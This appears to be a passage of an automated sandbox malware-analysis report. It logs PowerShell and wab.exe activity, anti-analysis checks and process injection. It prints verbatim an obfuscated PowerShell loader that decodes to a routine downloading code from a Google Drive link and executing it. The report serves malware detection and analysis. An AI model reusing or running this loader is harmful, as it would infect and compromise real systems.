            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 2EF0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 25BE0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 25B20000 memory reserve | memory write watch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 600000
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6547
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3260
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6017
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3840
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 5220
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 4609
            Source: C:\Windows\System32\wscript.exe TID: 7532 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788 Thread sleep time: -7378697629483816s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8156 Thread sleep count: 6017 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8156 Thread sleep count: 3840 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -22136092888451448s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1692 Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3656 Thread sleep count: 5220 > 30
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3656 Thread sleep count: 4609 > 30
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: wscript.exe, 00000001.00000003.1462009599.00000171CE2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463253642.00000171CE389000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPu9
            Source: powershell.exe, 00000003.00000002.2461093933.0000018939B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
            Source: wscript.exe, 00000001.00000002.1463808181.00000171D0433000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000001.00000002.1463735069.00000171D0391000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000001.00000003.1462529160.00000171D0433000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}W
            Source: wscript.exe, 00000001.00000002.1463388260.00000171D0280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\:
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Code function: 9_2_07B72FBC LdrInitializeThunk,LdrInitializeThunk,9_2_07B72FBC
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2EFFCFC
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. 
AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSamJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster 